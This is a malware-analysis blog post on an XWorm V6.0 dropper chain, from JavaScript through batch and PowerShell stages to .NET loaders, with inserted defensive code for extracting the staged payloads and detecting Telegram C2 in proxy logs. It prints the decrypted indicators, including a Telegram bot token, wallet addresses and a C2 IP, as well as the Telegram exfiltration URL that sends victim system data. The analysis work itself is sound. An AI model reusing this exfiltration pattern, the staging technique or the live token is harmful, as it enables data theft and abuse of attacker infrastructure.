What's XWorm?
"Malware with wide range of capabilities ranging from RAT to ransomware." -malpedia
Small Story
I will keep things simple as usual. I was checking out MalwareBazaar and a JavaScript file tagged as "XWorm" caught my eye, so I downloaded it to check out later (I had a competition, so there was no time to look at it for a week). This is the MalwareBazaar link of the file. First seen in the wild at "2025-07-23 16:04:23 UTC".
NOTE: All Files are provided at the end of this page.
Simple Flow
None of these files were downloaded from an external source. Most of them were extracted using Base64 decoding and AES decryption.
Analysis (Dropper, Evasion)
Extracting the files was simple for me. Instead of letting the code execute things, I wrote the decoded bytes/scripts to files and analyzed them one by one.
Starting with the JavaScript file: it had only one purpose, extracting "DallasBoulevard.bat" into "AppData/Local/Temp" and executing it.
This batch file had a few purposes and was also obfuscated, but I extracted the first thing it does: executing a PowerShell command. That PowerShell command itself reads the same bat file again (from a different directory), takes the first line starting with ":::", Base64-decodes it and executes the result (another PowerShell command).
This PowerShell command uses advanced techniques to avoid detection. Things it does:
The comments were added by me while analysing the script; the strings were also encrypted, so I had to decrypt them too.
After the PowerShell script finishes executing, it looks for the "::" line and splits it into two different executable files. The first .NET executable is useless and does nothing, but the second one decrypts bytes and executes "XWormClient.exe" (the main malware file we were looking for).
This .NET executable is highly obfuscated. I used NetReactorSlayer to deobfuscate it, but honestly it couldn't do much. I might have done something wrong, but it is what it is; I could get what I needed in the end.
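The staging described above (payloads hidden behind ":::" and "::" marker lines in a batch file, Base64-decoded and then run) can be unpacked statically the same way the post does it: decode to disk, never execute. The script below is an added example, not the post's own tooling and not the real DallasBoulevard.bat; the batch text it scans is constructed in the block, and the "pe/text/binary" classification is a rough magic-byte heuristic I added for naming the output files.

```python
"""Static extraction of payloads hidden behind ':::'/'::' marker lines in a
batch file: decode them to disk for analysis, never execute them.
Added example; SAMPLE_BAT is constructed, not the real dropper."""
import base64
import binascii
import hashlib
import re
from pathlib import Path

# Constructed stand-ins for the two stages the post describes:
# a PowerShell one-liner behind ":::" and a PE image behind "::".
_FAKE_PS = base64.b64encode(b'Write-Host "constructed stage"').decode()
_FAKE_PE = base64.b64encode(
    b"MZ\x90\x00" + b"\x00" * 56 + b"\x40\x00\x00\x00" + b"PE\x00\x00"
).decode()

SAMPLE_BAT = (
    "@echo off\r\n"
    "rem constructed sample, not the real DallasBoulevard.bat\r\n"
    f"::: {_FAKE_PS}\r\n"
    f":: {_FAKE_PE}\r\n"
    "echo done\r\n"
)

# A ':::' or '::' label followed by one Base64 token and nothing else.
# ':::' is tried first so it is not mis-read as '::' plus a colon.
MARKER_RE = re.compile(r"^(:::|::)\s*([A-Za-z0-9+/=]+)\s*$")


def classify(blob: bytes) -> str:
    """Rough content type: PE by magic bytes, otherwise printable text or binary."""
    if blob.startswith(b"MZ"):
        return "pe"
    for enc in ("utf-8", "utf-16-le"):  # PowerShell -EncodedCommand is UTF-16LE
        try:
            text = blob.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            return "text"
    return "binary"


def extract_marker_payloads(bat_text: str) -> list[dict]:
    """Return every decodable payload found on ':::'/'::' lines, in file order."""
    found = []
    for line_no, line in enumerate(bat_text.splitlines(), start=1):
        m = MARKER_RE.match(line)
        if not m:
            continue
        try:
            blob = base64.b64decode(m.group(2), validate=True)
        except binascii.Error:
            continue  # marker line that is not valid Base64: skip it
        found.append({
            "line": line_no,
            "marker": m.group(1),
            "kind": classify(blob),
            "size": len(blob),
            "sha256": hashlib.sha256(blob).hexdigest(),
            "data": blob,
        })
    return found


def dump_payloads(bat_text: str, outdir: Path) -> list[Path]:
    """Write each payload to outdir as stage<N>_line<L>.<kind>; return the paths.
    No stage gets an executable extension, so nothing is run by accident."""
    outdir.mkdir(parents=True, exist_ok=True)
    ext = {"pe": "pe", "text": "txt", "binary": "bin"}
    paths = []
    for i, p in enumerate(extract_marker_payloads(bat_text), start=1):
        path = outdir / f"stage{i}_line{p['line']}.{ext[p['kind']]}"
        path.write_bytes(p["data"])
        paths.append(path)
    return paths


if __name__ == "__main__":
    for p in extract_marker_payloads(SAMPLE_BAT):
        print(f"line {p['line']:>3} {p['marker']:<3} {p['kind']:<6} "
              f"{p['size']:>6} B  sha256={p['sha256'][:16]}...")
    print(dump_payloads(SAMPLE_BAT, Path("extracted_stages")))
```

Run it on a real dropper with `extract_marker_payloads(Path("sample.bat").read_text(errors="replace"))`; the hashes it prints are the values to look up or submit to MalwareBazaar, and the "pe" stages are what goes into dnSpy or NetReactorSlayer next.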
XWormClient
PART 1: Decrypt Strings: (ALL STRINGS) Glass0.
- obf_str1 = 192.159.99.85
- obf_str2 = 6000
- obf_str3 = <666666>
- obf_str4 = <Xwormmm>
- obf_str5 = XWorm V6.0
- obf_str6 = USB.exe
- string2 = bc1qac0j3zkpqwudsezg63x37nmqv2tanpk2zys43c
- obf_str7 = 0x9e335947293636ADfC39A13825Cd04244Fd0c1a9
- obf_str8 = TWNsPN7sYpTSogGAnixsTDJnnPCViDQ45r
- obf_str9 = 7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE
- obf_str10 = 440743435
PART 2: Create new Mutex with name: "6NW0cPlN6C2gZ2Tp"
PART 3: Application run and set in infinite loop
PART 4: Setup Network Connection (DefaultConnectionLimit etc. changed)
PART 5: (After WebClient object created)
obj3: "☠ [XWorm V6.0 @XCoderTools]\r\n\r\nNew CLient : \r\n41B3E62F549A81F56A43\r\n\r\nUserName : flare\r\nOSFullName : Microsoft Windows 10 Pro\r\nUSB : False\r\nCPU : 13th Gen Intel i7-13650HX\r\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \r\nRAM : 7.98 GB\r\nGroup : XWorm V6.0"
NOTE: This is my PC configuration (VM)
Then a request is sent to the URL built by concatenating obj2 (a string[6] array, as shown in the debugger):
[0] "https://api.telegram.org/bot"
[1] "7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE"
[2] "/sendMessage?chat_id="
[3] "440743435"
[4] "&text="
[5] "☠ [XWorm V6.0 @XCoderTools]\r\n\r\nNew CLient : \r\n41B3E62F549A81F56A43\r\n\r\nUserName : flare\r\nOSFullName : Microsoft Windows 10 Pro\r\nUSB : False\r\nCPU : 13th Gen Intel i7-13650HX\r\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \r\nRAM : 7.98 GB\r\nGroup : XWorm V6.0"
returned: @"{""ok"":true,""result"":{""message_id"":1132,""from"":{""id"":7257315662,""is_bot"":true,""first_name"":""VIRUS \ud83e\udda0 BOTS"",""username"":""Alvin0365bot""},""chat"":{""id"":440743435,""first_name"":""Alvinmullar"",""username"":""alvinmullar"",""type"":""private""},""date"":1753785840,""text"":""\u2620 [XWorm V6.0 @XCoderTools]\n\nNew CLient : \n41B3E62F549A81F56A43\n\nUserName : flare\nOSFullName : Microsoft Windows 10 Pro\nUSB : False\nCPU : 13th Gen Intel i7-13650HX\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \nRAM : 7.98 GB\nGroup : XWorm V6.0"",""entities"":[{""offset"":14,""length"":12,""type"":""mention""}]}}"
After that, the WebClient is disposed.
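The "New CLient" beacon above is a plain HTTPS GET to api.telegram.org with the bot token in the URL path and the chat_id and message in the query string, which makes it easy to spot in web-proxy logs. The following detection is an added example (not from the post): it walks constructed proxy log lines, flags Bot API calls, pulls out the bot id and chat_id as IOCs, and keeps the token itself out of the alert because it is a credential. The log format, the bot token and the chat_id in the sample are all made up.

```python
"""Detect Telegram Bot API use as a C2/exfil channel in web-proxy logs and
extract bot id / chat_id as IOCs. Added example; SAMPLE_LOG, the bot token
and the chat_id in it are constructed, not the post's real IOCs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy lines: "<timestamp> <client_ip> <method> <url> <status>".
SAMPLE_LOG = """\
2025-07-29T10:04:00Z 10.0.0.21 GET https://api.telegram.org/bot1234567890:AAEXAMPLEtokenNOTreal_xxxxxxxxxxxxxxx/sendMessage?chat_id=111222333&text=%E2%98%A0%20%5BXWorm%20V6.0%5D%0A%0ANew%20CLient 200
2025-07-29T10:04:01Z 10.0.0.21 GET https://www.bing.com/search?q=weather 200
2025-07-29T10:05:00Z 10.0.0.35 POST https://api.telegram.org/bot1234567890:AAEXAMPLEtokenNOTreal_xxxxxxxxxxxxxxx/sendDocument 200
2025-07-29T10:06:00Z 10.0.0.50 GET https://api.telegram.org/ 404
"""

# Bot API path: /bot<numeric id>:<secret>/<method>
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{20,})/(\w+)$")

# Strings from the beacon text seen in the sample; extend as needed.
BEACON_MARKERS = ("New CLient", "XWorm")


def parse_line(line: str) -> dict:
    """Split one constructed-format proxy line into its fields."""
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method,
            "url": url, "status": int(status)}


def telegram_bot_hit(url: str):
    """Return (bot_id, api_method, chat_id) for a Bot API call, else None.
    The token is deliberately dropped: it belongs in a ticket, not an alert."""
    u = urlsplit(url)
    if u.hostname != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(u.path)
    if not m:
        return None
    bot_id, _token, api_method = m.groups()
    chat_id = parse_qs(u.query).get("chat_id", [None])[0]
    return bot_id, api_method, chat_id


def scan(log_text: str) -> list[dict]:
    """One alert per Bot API call; beacon_like marks text matching known markers."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        hit = telegram_bot_hit(rec["url"])
        if hit is None:
            continue
        bot_id, api_method, chat_id = hit
        # parse_qs already percent-decodes, so the skull and newlines come back.
        text = parse_qs(urlsplit(rec["url"]).query).get("text", [""])[0]
        alerts.append({
            "ts": rec["ts"], "client": rec["client"], "bot_id": bot_id,
            "api_method": api_method, "chat_id": chat_id,
            "beacon_like": any(marker in text for marker in BEACON_MARKERS),
        })
    return alerts


def hosts_per_bot(alerts: list[dict]) -> dict:
    """Group talking hosts by bot id: one bot, many hosts is the campaign view."""
    out: dict[str, set] = {}
    for a in alerts:
        out.setdefault(a["bot_id"], set()).add(a["client"])
    return {bot: sorted(hosts) for bot, hosts in out.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(a)
    print(hosts_per_bot(found))
```

Some legitimate software does talk to the Bot API, so the useful alert is a bot id never seen before in the environment, beacon-like text, or sendDocument from a host that has no business automating Telegram; blocking api.telegram.org at the proxy is the blunt option where no such business use exists.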
Result?
What we get is: this Telegram bot is used as C2, and "192.159.99.85:6000" is (probably, not sure) used for the remote connection. I didn't go deeper, but I uploaded all these files to MalwareBazaar for anyone who needs to check them out. These are all new files, and the XWormClient version is "6.0" (latest).